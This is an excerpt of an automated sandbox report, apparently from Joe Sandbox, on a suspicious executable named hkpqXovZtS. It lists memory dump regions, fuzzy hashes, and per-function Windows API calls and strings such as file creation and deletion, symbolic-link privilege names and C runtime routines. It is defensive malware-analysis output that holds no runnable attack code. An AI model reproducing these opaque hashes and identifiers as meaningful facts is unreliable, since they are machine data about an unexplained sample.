                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a81ed29a93e2219e4a15a1b0769aec605961e4f05589c75cbcd65c5f39a0c1f9
                                                                                                                • Instruction ID: 00afb1a014a7f3bdd77cfdff7546058b0acfa308d14db06f361988ebec7fecca
                                                                                                                • Opcode Fuzzy Hash: a81ed29a93e2219e4a15a1b0769aec605961e4f05589c75cbcd65c5f39a0c1f9
                                                                                                                • Instruction Fuzzy Hash: 2D112B7190D356EFCB09DF18D65055AB3E9FFD4B08F00C81EA18D87244DB70A916EB86
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 915c2c28c9ca2d91d48aa3ccc9e7ecb680446a30d8617f28b79ed40f57889cda
                                                                                                                • Instruction ID: 88903359933b28dc19845d656790c83632083a39c8a076c028cc30bc53f606e6
                                                                                                                • Opcode Fuzzy Hash: 915c2c28c9ca2d91d48aa3ccc9e7ecb680446a30d8617f28b79ed40f57889cda
                                                                                                                • Instruction Fuzzy Hash: D3F03931A21224EBCB26DACCD814B8973BDEB48B64F520496E441EB684CBB4DE40CBD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ab17e480c7f28b9f3e277e22bc47b49dd693243f8fd2f3d03470623962dab936
                                                                                                                • Instruction ID: 80f76d182c1f2b13af6fea8deec4061f3e461568d5de02186e884fbca8bff432
                                                                                                                • Opcode Fuzzy Hash: ab17e480c7f28b9f3e277e22bc47b49dd693243f8fd2f3d03470623962dab936
                                                                                                                • Instruction Fuzzy Hash: 35F0F23150C305AFC742CF59C5408AAF3F8FFC4A14F10C92DA68887214E770A905CA82
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 22237f8dff0c9612b12e3455ba6ce15eda12ca618ad17e5b0d4c78190e67bf88
                                                                                                                • Instruction ID: 56cfc0ad253e6bfe1a632af0ff045909337e18181820428e1049b9b9e3d5a7e1
                                                                                                                • Opcode Fuzzy Hash: 22237f8dff0c9612b12e3455ba6ce15eda12ca618ad17e5b0d4c78190e67bf88
                                                                                                                • Instruction Fuzzy Hash: E8F0ED7090D601DFDB05CF04D2814ABB7A0FBA2B08F108C5EE14743100F738A926CB8B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1c3ed18552373d85d4183fd86c6c01c8f371cd09a67b814452281b6f684ff16a
                                                                                                                • Instruction ID: 96312cee40564d205e0f2e366548806d230f4e8694c07150844d4c55aeb18110
                                                                                                                • Opcode Fuzzy Hash: 1c3ed18552373d85d4183fd86c6c01c8f371cd09a67b814452281b6f684ff16a
                                                                                                                • Instruction Fuzzy Hash: 99E04672922228EBCB14DFD88914D8AB3BDEB48B04B11049AA601E3520C270DE00CBD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ffa4af83bf19185c09aa83c4ba1537d998611cee70fe7a2ffc76e3aa068c4d18
                                                                                                                • Instruction ID: e505f67d7fd0f35a12c6bc28c55b410344f6a285d8721398c04154fd9a17a4d6
                                                                                                                • Opcode Fuzzy Hash: ffa4af83bf19185c09aa83c4ba1537d998611cee70fe7a2ffc76e3aa068c4d18
                                                                                                                • Instruction Fuzzy Hash: 0FE0E23290E7C28FC7238B3885A0A46BFB0AF07244B4A08C7D080DF1A3C2146828CB12
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 93844a3d800d03e5b004c27c050908e5db124e9fb62951dc559b850393626272
                                                                                                                • Instruction ID: 0b20bd12e1cbfbc00a4be732231be84ba8af739c5a65eea723f1744a4a256892
                                                                                                                • Opcode Fuzzy Hash: 93844a3d800d03e5b004c27c050908e5db124e9fb62951dc559b850393626272
                                                                                                                • Instruction Fuzzy Hash: 23C08C3200830CAF83022BA28882054B2F8EA90100F204038860242322E7B09618CA85
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004068C7
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000), ref: 00406936
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00406946
                                                                                                                • _wcslen.LIBCMT ref: 0040697E
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004069EA
                                                                                                                • _wcscpy.LIBCMT ref: 00406A04
                                                                                                                • _wcslen.LIBCMT ref: 00406A10
                                                                                                                • _wcscpy.LIBCMT ref: 00406A58
                                                                                                                  • Part of subcall function 00406550: GetLastError.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000000,00000020,?), ref: 004065A5
                                                                                                                  • Part of subcall function 00406550: CloseHandle.KERNEL32(?,00000000,?,?,00000000,00000020,?), ref: 004065B4
                                                                                                                • _wcscpy.LIBCMT ref: 00406A7C
                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00406B26
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00406B70
                                                                                                                • GetLastError.KERNEL32(?,?,?), ref: 00406B8E
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00406BD8
                                                                                                                  • Part of subcall function 004197A3: ___sbh_find_block.LIBCMT ref: 004197CC
                                                                                                                  • Part of subcall function 004197A3: ___sbh_free_block.LIBCMT ref: 004197DB
                                                                                                                  • Part of subcall function 004197A3: GetLastError.KERNEL32(00000000,00000000,00429578,0000000C,0041E244,00000000,004298A0,0000000C,0041E27E,00000000,00419CF5,?,00423A76,00000004,00429A40,0000000C), ref: 0041981C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateErrorFileHandleLast_wcscpy$_wcslen$DeleteDirectoryH_prolog___sbh_find_block___sbh_free_block
                                                                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\$lB
                                                                                                                • API String ID: 1519039449-3052919484
                                                                                                                • Opcode ID: d74cf4a6e6eaba5b538327a15ed480606066a8aec48130440f3a35a51a80831d
                                                                                                                • Instruction ID: 4bcf266bcd514663229e52bad585c9fa2ed6120b3b11112c6a55a11edf41b38e
                                                                                                                • Opcode Fuzzy Hash: d74cf4a6e6eaba5b538327a15ed480606066a8aec48130440f3a35a51a80831d
                                                                                                                • Instruction Fuzzy Hash: B7A1E3B1600254EEDB20EF64CC45BEA73B8AF04304F00456FF55AE7281DB79AA94CB68
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy_wcsncpy$_wcslen
                                                                                                                • String ID: UNC$\\?\
                                                                                                                • API String ID: 2527645450-253988292
                                                                                                                • Opcode ID: 2c695419c2e62f5388721ef23b6ad1a10790c76ee85fbff0f03aa0e208c3e76d
                                                                                                                • Instruction ID: 447ae749f45e01d9c9a3efed3454102144e23ff83b1bbe9873edae9025d6cbe2
                                                                                                                • Opcode Fuzzy Hash: 2c695419c2e62f5388721ef23b6ad1a10790c76ee85fbff0f03aa0e208c3e76d
                                                                                                                • Instruction Fuzzy Hash: D231D472900304A6CB20BE618C42EEB336CAF45748F18842FF55477182EBBCD99586AE
                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,022B3318,?,?), ref: 022A178B
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,022B3318,?,?), ref: 022A17AF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Module$FileHandleName
                                                                                                                • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\$kL
                                                                                                                • API String ID: 4146042529-2537061522
                                                                                                                • Opcode ID: 1a5f184b4efcdca7b6cf534568eaaf6223116b6539a005a4ddc2160bd2b71335
                                                                                                                • Instruction ID: a2a26bb69a3bbeade991b6a32985fe093a790bd85877b4b29ae87c625dcf8e31
                                                                                                                • Opcode Fuzzy Hash: 1a5f184b4efcdca7b6cf534568eaaf6223116b6539a005a4ddc2160bd2b71335
                                                                                                                • Instruction Fuzzy Hash: 22C129B5A202066BEB316EE48C59FFF736EDF45710F0405A8ED0D9194CF7309A66CAA4
                                                                                                                APIs
                                                                                                                • _wcslen.LIBCMT ref: 00418BEB
                                                                                                                • _malloc.LIBCMT ref: 00418BF8
                                                                                                                  • Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
                                                                                                                  • Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
                                                                                                                  • Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355
                                                                                                                • _wcscpy.LIBCMT ref: 00418C11
                                                                                                                • _wcscat.LIBCMT ref: 00418C1C
                                                                                                                • _wcscat.LIBCMT ref: 00418C27
                                                                                                                • _wcscat.LIBCMT ref: 00418C62
                                                                                                                • _wcscat.LIBCMT ref: 00418C73
                                                                                                                • _wcslen.LIBCMT ref: 00418C8C
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000106,00000000,00000000,00000040,-00000009,?,<html>,00000006), ref: 00418CBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$_wcslen$AllocateByteCharHeapMultiWide_malloc_wcscpy
                                                                                                                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                • API String ID: 532831754-4209811716
                                                                                                                • Opcode ID: ae29ef42d06069267daaa5c1e3adad9e8658f414fefcd541f1f2f83bdc308bb9
                                                                                                                • Instruction ID: eb02cb7d5e01995ca343aeefa9ef4e3976a0cdf504ece158080fbb147d33cfe2
                                                                                                                • Opcode Fuzzy Hash: ae29ef42d06069267daaa5c1e3adad9e8658f414fefcd541f1f2f83bdc308bb9
                                                                                                                • Instruction Fuzzy Hash: C9313832940244BACB20A7A19C82FEF77A89F52720F15415FF8146B2C2EF7C4D8183E9
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strlen$_swprintf_wcschr_wcscpy_wcsncpy_wcsrchr
                                                                                                                • String ID: %08x$@gB$DgB$HgB$JgB
                                                                                                                • API String ID: 3224783807-3012681848
                                                                                                                • Opcode ID: 6e1d6a488b7c125c534b4a20ff991f733637cdb8b8d6a96d09dd2bb32fe32aeb
                                                                                                                • Instruction ID: ec7d254ae4d0367b488d4250043f0b82adcf22d54704baab9ccd03eed508303c
                                                                                                                • Opcode Fuzzy Hash: 6e1d6a488b7c125c534b4a20ff991f733637cdb8b8d6a96d09dd2bb32fe32aeb
                                                                                                                • Instruction Fuzzy Hash: A831B3326042196AEB24AA65EC85FEB62ACDB40354F50007FF905E62D1EF3CDD8096ED
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041DDEB
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0041DDF8
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0041DE05
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0041DE12
                                                                                                                • TlsSetValue.KERNEL32(00000000), ref: 0041DE7D
                                                                                                                • __init_pointers.LIBCMT ref: 0041DE87
                                                                                                                • __mtterm.LIBCMT ref: 0041DF3D
                                                                                                                  • Part of subcall function 0041DAD4: TlsFree.KERNEL32(00000016,0041DF42,KERNEL32.DLL), ref: 0041DAFF
                                                                                                                  • Part of subcall function 0041DAD4: RtlDeleteCriticalSection.NTDLL(00000000), ref: 0041E14F
                                                                                                                  • Part of subcall function 0041DAD4: RtlDeleteCriticalSection.NTDLL(00000016), ref: 0041E179
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CriticalDeleteSection$FreeValue__init_pointers__mtterm
                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                • API String ID: 1151902095-3819984048
                                                                                                                • Opcode ID: 3ebff28e03d5beeb4e66c456e96221f4ce69474f75d430ea8086b39d1b20ebca
                                                                                                                • Instruction ID: 7b9ed8b20f57f21700ef2f037a4b37f55460a6d18105e71b1c33805bea37f77b
                                                                                                                • Opcode Fuzzy Hash: 3ebff28e03d5beeb4e66c456e96221f4ce69474f75d430ea8086b39d1b20ebca
                                                                                                                • Instruction Fuzzy Hash: 6231F8F5D4A7109AC720AB36AC05A963AA4FB46310F12493FF414932B1DB7C8495CB5E
                                                                                                                APIs
                                                                                                                • ___free_lconv_mon.LIBCMT ref: 022AC236
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC52C
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC53E
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC550
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC562
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC574
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC586
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC598
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC5AA
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC5BC
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC5CE
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC5E0
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC5F2
                                                                                                                  • Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC604
                                                                                                                • _free.LIBCMT ref: 022AC22B
                                                                                                                  • Part of subcall function 022A7A35: HeapFree.KERNEL32(00000000,00000000,?,022A6300), ref: 022A7A4B
                                                                                                                  • Part of subcall function 022A7A35: GetLastError.KERNEL32(?,?,022A6300), ref: 022A7A5D
                                                                                                                • _free.LIBCMT ref: 022AC24D
                                                                                                                • _free.LIBCMT ref: 022AC262
                                                                                                                • _free.LIBCMT ref: 022AC26D
                                                                                                                • _free.LIBCMT ref: 022AC28F
                                                                                                                • _free.LIBCMT ref: 022AC2A2
                                                                                                                • _free.LIBCMT ref: 022AC2B0
                                                                                                                • _free.LIBCMT ref: 022AC2BB
                                                                                                                • _free.LIBCMT ref: 022AC2F3
                                                                                                                • _free.LIBCMT ref: 022AC2FA
                                                                                                                • _free.LIBCMT ref: 022AC317
                                                                                                                • _free.LIBCMT ref: 022AC32F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                • String ID:
                                                                                                                • API String ID: 161543041-0
                                                                                                                • Opcode ID: 49b373e60b7e7bf46c99c86da23b671cdc6507f4d12e4af87cd5930afd35453e
                                                                                                                • Instruction ID: 79faa964318f19ffc261728ef28eae47bde59e2c93e55df6013a0a5a6bd6cd33
                                                                                                                • Opcode Fuzzy Hash: 49b373e60b7e7bf46c99c86da23b671cdc6507f4d12e4af87cd5930afd35453e
                                                                                                                • Instruction Fuzzy Hash: 2C319132620702AFDF21AEF8DC58B5AB3E5AF01750F10446AE056DB959DF74E940CF54
                                                                                                                APIs
                                                                                                                • _wcslen.LIBCMT ref: 0041892B
                                                                                                                • _malloc.LIBCMT ref: 00418939
                                                                                                                  • Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
                                                                                                                  • Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
                                                                                                                  • Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355
                                                                                                                • _wcscpy.LIBCMT ref: 00418957
                                                                                                                • _wcslen.LIBCMT ref: 0041895D
                                                                                                                • _wcscpy.LIBCMT ref: 004189A5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy_wcslen$AllocateHeap_malloc
                                                                                                                • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                • API String ID: 2405444336-406990186
                                                                                                                • Opcode ID: 8ffd512121a4bce5513adb12e64604f1f0251d70d853ce1b00fe6af10de29143
                                                                                                                • Instruction ID: 2c1cdc7596912b9ae3e5a13e1f3b5786512cf4ed6d5c0e0c2ffc7dfa181cc720
                                                                                                                • Opcode Fuzzy Hash: 8ffd512121a4bce5513adb12e64604f1f0251d70d853ce1b00fe6af10de29143
